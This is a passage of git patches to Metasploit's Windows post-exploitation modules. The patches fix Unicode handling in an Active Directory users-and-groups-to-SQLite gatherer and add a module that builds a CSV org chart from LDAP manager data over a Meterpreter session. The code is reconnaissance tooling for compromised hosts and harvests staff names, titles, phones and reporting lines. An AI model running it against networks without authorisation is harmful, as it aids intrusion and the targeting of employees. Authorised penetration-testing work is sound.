individual_group[9][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - g_managedBy: individual_group[10][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + g_comment: individual_group[9][:value].encode('UTF-8').scrub, + g_managedBy: individual_group[10][:value].encode('UTF-8').scrub, # Specifies a group that is created by the system. g_GT_GROUP_CREATED_BY_SYSTEM: (grouptype_int & 0x00000001).zero? ? 0 : 1, # Specifies a group with global scope. @@ -153,25 +153,25 @@ class Metasploit3 < Msf::Post # Add the group to the database # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx sql_param_user = { u_rid: user_rid, - u_distinguishedName: group_user[0][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + u_distinguishedName: group_user[0][:value].encode('UTF-8').scrub, u_sAMAccountType: group_user[2][:value].to_i, - u_sAMAccountName: group_user[3][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - u_displayName: group_user[4][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - u_description: group_user[5][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + u_sAMAccountName: group_user[3][:value].encode('UTF-8').scrub, + u_displayName: group_user[4][:value].encode('UTF-8').scrub, + u_description: group_user[5][:value].encode('UTF-8').scrub, u_logonCount: group_user[6][:value].to_i, u_userAccountControl: uac_int, - u_userPrincipalName: group_user[8][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - u_whenChanged: group_user[9][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - u_whenCreated: group_user[10][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + u_userPrincipalName: group_user[8][:value].encode('UTF-8').scrub, + u_whenChanged: group_user[9][:value].encode('UTF-8').scrub, + u_whenCreated: group_user[10][:value].encode('UTF-8').scrub, u_primaryGroupID: group_user[11][:value].to_i, u_badPwdCount: group_user[12][:value].to_i, - u_comment: group_user[13][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - u_title: group_user[14][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - u_cn: group_user[15][:value].to_s.encode('UTF-8',:invalid=>:replace,:replace=>"?"), + u_comment: group_user[13][:value].encode('UTF-8').scrub, + u_title: group_user[14][:value].encode('UTF-8').scrub, + u_cn: group_user[15][:value].to_s.encode('UTF-8').scrub, # Indicates that a given object has had its ACLs changed to a more secure value by the # system because it was a member of one of the administrative groups (directly or transitively). u_adminCount: group_user[16][:value].to_i, - u_manager: group_user[17][:value].to_s.encode('UTF-8',:invalid=>:replace,:replace=>"?"), + u_manager: group_user[17][:value].to_s.encode('UTF-8').scrub, # The login script is executed u_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, # The user account is disabled. @@ -272,23 +272,23 @@ class Metasploit3 < Msf::Post # its a user or a computer and so, for convenience and ease of use, I have put them in completely separate tables. # Also add the sAMAccount type flags from https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637(v=vs.85).aspx sql_param_computer = { c_rid: computer_rid, - c_distinguishedName: comp[0][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - c_cn: comp[2][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - c_dNSHostName: comp[3][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + c_distinguishedName: comp[0][:value].encode('UTF-8').scrub, + c_cn: comp[2][:value].encode('UTF-8').scrub, + c_dNSHostName: comp[3][:value].encode('UTF-8').scrub, c_sAMAccountType: sat_int, - c_sAMAccountName: comp[5][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - c_displayName: comp[6][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + c_sAMAccountName: comp[5][:value].encode('UTF-8').scrub, + c_displayName: comp[6][:value].encode('UTF-8').scrub, c_logonCount: comp[7][:value].to_i, c_userAccountControl: uac_int, - c_whenChanged: comp[9][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - c_whenCreated: comp[10][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + c_whenChanged: comp[9][:value].encode('UTF-8').scrub, + c_whenCreated: comp[10][:value].encode('UTF-8').scrub, c_primaryGroupID: comp[11][:value].to_i, c_badPwdCount: comp[12][:value].to_i, - c_operatingSystem: comp[13][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - c_operatingSystemServicePack: comp[14][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - c_operatingSystemVersion: comp[15][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - c_description: comp[16][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - c_comment: comp[17][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + c_operatingSystem: comp[13][:value].encode('UTF-8').scrub, + c_operatingSystemServicePack: comp[14][:value].encode('UTF-8').scrub, + c_operatingSystemVersion: comp[15][:value].encode('UTF-8').scrub, + c_description: comp[16][:value].encode('UTF-8').scrub, + c_comment: comp[17][:value].encode('UTF-8').scrub, # The login script is executed c_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, # The user account is disabled. From 16cf3c620799655e9f3c46d5220c588382fe22e1 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Mon, 21 Dec 2015 13:28:27 +0000 Subject: [PATCH 135/686] Further messing about with unicode conversions --- .../windows/gather/ad_groupusers_to_sql.rb | 60 +++++++++---------- 1 file changed, 30 insertions(+), 30 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 06061fc0db..1205c204fd 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -97,16 +97,16 @@ class Metasploit3 < Msf::Post # Note that the conversions to UTF-8 are necessary because of the way SQLite detects column type affinity # Turns out that the 'fix' is documented in https://github.com/rails/rails/issues/1965 sql_param_group = { g_rid: group_rid, - g_distinguishedName: individual_group[0][:value].encode('UTF-8').scrub, + g_distinguishedName: individual_group[0][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), g_sAMAccountType: sat_int, - g_sAMAccountName: individual_group[3][:value].encode('UTF-8').scrub, - g_whenChanged: individual_group[4][:value].encode('UTF-8').scrub, - g_whenCreated: individual_group[5][:value].encode('UTF-8').scrub, - g_description: individual_group[6][:value].encode('UTF-8').scrub, + g_sAMAccountName: individual_group[3][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + g_whenChanged: individual_group[4][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + g_whenCreated: individual_group[5][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + g_description: individual_group[6][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), g_groupType: grouptype_int, g_adminCount: individual_group[8][:value].to_i, - g_comment: individual_group[9][:value].encode('UTF-8').scrub, - g_managedBy: individual_group[10][:value].encode('UTF-8').scrub, + g_comment: individual_group[9][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + g_managedBy: individual_group[10][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), # Specifies a group that is created by the system. g_GT_GROUP_CREATED_BY_SYSTEM: (grouptype_int & 0x00000001).zero? ? 0 : 1, # Specifies a group with global scope. @@ -153,25 +153,25 @@ class Metasploit3 < Msf::Post # Add the group to the database # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx sql_param_user = { u_rid: user_rid, - u_distinguishedName: group_user[0][:value].encode('UTF-8').scrub, + u_distinguishedName: group_user[0][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), u_sAMAccountType: group_user[2][:value].to_i, - u_sAMAccountName: group_user[3][:value].encode('UTF-8').scrub, - u_displayName: group_user[4][:value].encode('UTF-8').scrub, - u_description: group_user[5][:value].encode('UTF-8').scrub, + u_sAMAccountName: group_user[3][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + u_displayName: group_user[4][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + u_description: group_user[5][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), u_logonCount: group_user[6][:value].to_i, u_userAccountControl: uac_int, - u_userPrincipalName: group_user[8][:value].encode('UTF-8').scrub, - u_whenChanged: group_user[9][:value].encode('UTF-8').scrub, - u_whenCreated: group_user[10][:value].encode('UTF-8').scrub, + u_userPrincipalName: group_user[8][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + u_whenChanged: group_user[9][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + u_whenCreated: group_user[10][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), u_primaryGroupID: group_user[11][:value].to_i, u_badPwdCount: group_user[12][:value].to_i, - u_comment: group_user[13][:value].encode('UTF-8').scrub, - u_title: group_user[14][:value].encode('UTF-8').scrub, - u_cn: group_user[15][:value].to_s.encode('UTF-8').scrub, + u_comment: group_user[13][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + u_title: group_user[14][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + u_cn: group_user[15][:value].to_s.encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), # Indicates that a given object has had its ACLs changed to a more secure value by the # system because it was a member of one of the administrative groups (directly or transitively). u_adminCount: group_user[16][:value].to_i, - u_manager: group_user[17][:value].to_s.encode('UTF-8').scrub, + u_manager: group_user[17][:value].to_s.encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), # The login script is executed u_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, # The user account is disabled. @@ -272,23 +272,23 @@ class Metasploit3 < Msf::Post # its a user or a computer and so, for convenience and ease of use, I have put them in completely separate tables. # Also add the sAMAccount type flags from https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637(v=vs.85).aspx sql_param_computer = { c_rid: computer_rid, - c_distinguishedName: comp[0][:value].encode('UTF-8').scrub, - c_cn: comp[2][:value].encode('UTF-8').scrub, - c_dNSHostName: comp[3][:value].encode('UTF-8').scrub, + c_distinguishedName: comp[0][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + c_cn: comp[2][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + c_dNSHostName: comp[3][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), c_sAMAccountType: sat_int, - c_sAMAccountName: comp[5][:value].encode('UTF-8').scrub, - c_displayName: comp[6][:value].encode('UTF-8').scrub, + c_sAMAccountName: comp[5][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + c_displayName: comp[6][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), c_logonCount: comp[7][:value].to_i, c_userAccountControl: uac_int, - c_whenChanged: comp[9][:value].encode('UTF-8').scrub, - c_whenCreated: comp[10][:value].encode('UTF-8').scrub, + c_whenChanged: comp[9][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + c_whenCreated: comp[10][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), c_primaryGroupID: comp[11][:value].to_i, c_badPwdCount: comp[12][:value].to_i, - c_operatingSystem: comp[13][:value].encode('UTF-8').scrub, - c_operatingSystemServicePack: comp[14][:value].encode('UTF-8').scrub, - c_operatingSystemVersion: comp[15][:value].encode('UTF-8').scrub, - c_description: comp[16][:value].encode('UTF-8').scrub, - c_comment: comp[17][:value].encode('UTF-8').scrub, + c_operatingSystem: comp[13][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + c_operatingSystemServicePack: comp[14][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + c_operatingSystemVersion: comp[15][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + c_description: comp[16][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + c_comment: comp[17][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), # The login script is executed c_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, # The user account is disabled. From 03b904cc4ea280e31076994a30eee47fb54ab6b4 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Mon, 21 Dec 2015 13:29:47 +0000 Subject: [PATCH 136/686] Initial version --- .../post/windows/gather/make_csv_orgchart.rb | 104 ++++++++++++++++++ 1 file changed, 104 insertions(+) create mode 100644 modules/post/windows/gather/make_csv_orgchart.rb diff --git a/modules/post/windows/gather/make_csv_orgchart.rb b/modules/post/windows/gather/make_csv_orgchart.rb new file mode 100644 index 0000000000..8281481b24 --- /dev/null +++ b/modules/post/windows/gather/make_csv_orgchart.rb @@ -0,0 +1,104 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'rex' +require 'msf/core' + +class Metasploit3 < Msf::Post + include Msf::Auxiliary::Report + include Msf::Post::Windows::LDAP + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'Generate CSV Org Chart using Manager Information', + 'Description' => %{ + This module will generate a CSV file containing all users and their managers, which can be + imported into Visio which will render it. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Stuart Morgan ' + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + + register_options([ + OptBool.new('WITH_MANAGERS_ONLY', [true, 'Only users with managers', false]), + OptBool.new('ACTIVE_USERS_ONLY', [true, 'Only include active users (i.e. not disabled ones)', true]), + OptBool.new('STORE_LOOT', [true, 'Store the organisational chart information in CSV format in loot', true]), + OptString.new('FILTER', [false, 'Additional LDAP filter to use when searching for users', '']), + ], self.class) + end + + def run + max_search = datastore['MAX_SEARCH'] + user_fields = ['cn','manager','description','title','telephoneNumber','department','division','userPrincipalName','company'] + + begin + qs = [] + qs << '(objectCategory=person)' + qs << '(objectClass=user)' + qs << '(!userAccountControl:1.2.840.113556.1.4.803:=2)' if datastore['ACTIVE_USERS_ONLY'] + qs << '(manager=*)' if datastore['WITH_MANAGERS_ONLY'] + qs << "(#{datastore['FILTER']})" if datastore['FILTER'] != "" + + query_string = "(&(#{qs.join('')}))" + vprint_status("Executing #{query_string}") + q = query(query_string, max_search, user_fields) + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e + # Can't bind or in a network w/ limited accounts + print_error(e.message) + return + end + + if q.nil? || q[:results].empty? + print_status('No results returned.') + else + user_fields << 'reports_to' + results_table = parse_results(q[:results]) + print_line results_table.to_s + if datastore['STORE_LOOT'] + stored_path = store_loot('ad.orgchart', 'text/csv', session, results_table.to_csv) + print_status("CSV Organisational Chart Information saved to: #{stored_path}") + end + end + end + + # Takes the results of LDAP query, parses them into a table + def parse_results(results) + results_table = Rex::Ui::Text::Table.new( + 'Header' => "Users & Managers", + 'Indent' => 1, + 'SortIndex' => -1, + 'Columns' => ['cn','description','title','phone','department','division','e-mail','company','reports_to'] + ) + + results.each do |result| + row = [] + + result.each_with_index do |field,idx| + next if idx==1 # Don't include the manager DN + + if field.nil? + row << "" + else + row << field[:value] + end + end + + reports_to = /^CN=(?.+?),(? Date: Mon, 21 Dec 2015 13:31:26 +0000 Subject: [PATCH 137/686] Added comments --- modules/post/windows/gather/make_csv_orgchart.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/post/windows/gather/make_csv_orgchart.rb b/modules/post/windows/gather/make_csv_orgchart.rb index 8281481b24..715f5385fa 100644 --- a/modules/post/windows/gather/make_csv_orgchart.rb +++ b/modules/post/windows/gather/make_csv_orgchart.rb @@ -90,6 +90,8 @@ class Metasploit3 < Msf::Post end end + # Parse the manager CN string to grab the CN= field only. + # Note that it needs the negative lookbehind to avoid escaped characters. reports_to = /^CN=(?.+?),(? Date: Mon, 21 Dec 2015 13:32:11 +0000 Subject: [PATCH 138/686] msftidy - fixed module name --- modules/post/windows/gather/make_csv_orgchart.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/make_csv_orgchart.rb b/modules/post/windows/gather/make_csv_orgchart.rb index 715f5385fa..28073f0e7a 100644 --- a/modules/post/windows/gather/make_csv_orgchart.rb +++ b/modules/post/windows/gather/make_csv_orgchart.rb @@ -13,7 +13,7 @@ class Metasploit3 < Msf::Post def initialize(info = {}) super(update_info( info, - 'Name' => 'Generate CSV Org Chart using Manager Information', + 'Name' => 'Generate CSV Organisational Chart Data Using Manager Information', 'Description' => %{ This module will generate a CSV file containing all users and their managers, which can be imported into Visio which will render it. From 751a0708bf47bf46ccc5e81b7ff7d2b7b7eee2ef Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Mon, 21 Dec 2015 13:32:29 +0000 Subject: [PATCH 139/686] rubocop --- modules/post/windows/gather/make_csv_orgchart.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/post/windows/gather/make_csv_orgchart.rb b/modules/post/windows/gather/make_csv_orgchart.rb index 28073f0e7a..59b4e3d71b 100644 --- a/modules/post/windows/gather/make_csv_orgchart.rb +++ b/modules/post/windows/gather/make_csv_orgchart.rb @@ -14,10 +14,10 @@ class Metasploit3 < Msf::Post super(update_info( info, 'Name' => 'Generate CSV Organisational Chart Data Using Manager Information', - 'Description' => %{ + 'Description' => %( This module will generate a CSV file containing all users and their managers, which can be imported into Visio which will render it. - }, + ), 'License' => MSF_LICENSE, 'Author' => [ 'Stuart Morgan ' @@ -30,13 +30,13 @@ class Metasploit3 < Msf::Post OptBool.new('WITH_MANAGERS_ONLY', [true, 'Only users with managers', false]), OptBool.new('ACTIVE_USERS_ONLY', [true, 'Only include active users (i.e. not disabled ones)', true]), OptBool.new('STORE_LOOT', [true, 'Store the organisational chart information in CSV format in loot', true]), - OptString.new('FILTER', [false, 'Additional LDAP filter to use when searching for users', '']), + OptString.new('FILTER', [false, 'Additional LDAP filter to use when searching for users', '']) ], self.class) end def run max_search = datastore['MAX_SEARCH'] - user_fields = ['cn','manager','description','title','telephoneNumber','department','division','userPrincipalName','company'] + user_fields = ['cn', 'manager', 'description', 'title', 'telephoneNumber', 'department', 'division', 'userPrincipalName', 'company'] begin qs = [] @@ -74,14 +74,14 @@ class Metasploit3 < Msf::Post 'Header' => "Users & Managers", 'Indent' => 1, 'SortIndex' => -1, - 'Columns' => ['cn','description','title','phone','department','division','e-mail','company','reports_to'] + 'Columns' => ['cn', 'description', 'title', 'phone', 'department', 'division', 'e-mail', 'company', 'reports_to'] ) results.each do |result| row = [] - result.each_with_index do |field,idx| - next if idx==1 # Don't include the manager DN + result.each_with_index do |field, idx| + next if idx == 1 # Don't include the manager DN if field.nil? row << "" @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Post if reports_to.nil? row << "" else - row << reports_to['cn'].gsub('\,',',') + row << reports_to['cn'].gsub('\,', ',') end results_table << row From 30e283b0ae8838b09ee09fcf4e9a19f19273bfad Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Mon, 21 Dec 2015 17:28:36 +0000 Subject: [PATCH 140/686] fixup --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 1205c204fd..3ecf9a41d5 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Post # Download the list of groups from Active Directory vprint_status "Retrieving AD Groups" begin - group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount', 'comment', 'managedBy'] + group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount', 'comment', 'managedBy','cn'] if datastore['GROUP_FILTER'].empty? group_query = "(objectClass=group)" else @@ -107,6 +107,7 @@ class Metasploit3 < Msf::Post g_adminCount: individual_group[8][:value].to_i, g_comment: individual_group[9][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), g_managedBy: individual_group[10][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + g_cn: individual_group[11][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), # Specifies a group that is created by the system. g_GT_GROUP_CREATED_BY_SYSTEM: (grouptype_int & 0x00000001).zero? ? 0 : 1, # Specifies a group with global scope. @@ -448,6 +449,7 @@ class Metasploit3 < Msf::Post 'g_adminCount INTEGER,'\ 'g_description TEXT,'\ 'g_comment TEXT,'\ + 'g_cn TEXT,'\ 'g_managedBy TEXT,'\ 'g_whenChanged TEXT,'\ 'g_whenCreated TEXT,'\ From 0b6969afbcb2cff41d87f75fe84c4997e0f1a8cd Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Mon, 21 Dec 2015 17:30:32 +0000 Subject: [PATCH 141/686] Rubocop. This encoding mess was the only way I could find to deal with a number of parsing errors when testing this against a multilingual domain. --- .../windows/gather/ad_groupusers_to_sql.rb | 64 +++++++++---------- 1 file changed, 32 insertions(+), 32 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 3ecf9a41d5..22294cf960 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Post # Download the list of groups from Active Directory vprint_status "Retrieving AD Groups" begin - group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount', 'comment', 'managedBy','cn'] + group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount', 'comment', 'managedBy', 'cn'] if datastore['GROUP_FILTER'].empty? group_query = "(objectClass=group)" else @@ -97,17 +97,17 @@ class Metasploit3 < Msf::Post # Note that the conversions to UTF-8 are necessary because of the way SQLite detects column type affinity # Turns out that the 'fix' is documented in https://github.com/rails/rails/issues/1965 sql_param_group = { g_rid: group_rid, - g_distinguishedName: individual_group[0][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + g_distinguishedName: individual_group[0][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), g_sAMAccountType: sat_int, - g_sAMAccountName: individual_group[3][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - g_whenChanged: individual_group[4][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - g_whenCreated: individual_group[5][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - g_description: individual_group[6][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + g_sAMAccountName: individual_group[3][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + g_whenChanged: individual_group[4][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + g_whenCreated: individual_group[5][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + g_description: individual_group[6][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), g_groupType: grouptype_int, g_adminCount: individual_group[8][:value].to_i, - g_comment: individual_group[9][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - g_managedBy: individual_group[10][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - g_cn: individual_group[11][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + g_comment: individual_group[9][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + g_managedBy: individual_group[10][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + g_cn: individual_group[11][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), # Specifies a group that is created by the system. g_GT_GROUP_CREATED_BY_SYSTEM: (grouptype_int & 0x00000001).zero? ? 0 : 1, # Specifies a group with global scope. @@ -154,25 +154,25 @@ class Metasploit3 < Msf::Post # Add the group to the database # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx sql_param_user = { u_rid: user_rid, - u_distinguishedName: group_user[0][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + u_distinguishedName: group_user[0][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), u_sAMAccountType: group_user[2][:value].to_i, - u_sAMAccountName: group_user[3][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - u_displayName: group_user[4][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), - u_description: group_user[5][:value].encode('UTF-16be', :invalid=>:replace,:undef=>:replace,:replace=>'?').encode('UTF-8',:invalid=>:replace,:undef=>:replace,:replace=>'?'), + u_sAMAccountName: group_user[3][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + u_displayName: group_user[4][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + u_description: group_user[5][:value].encode('UTF-16be', invalid: :replace, undef: 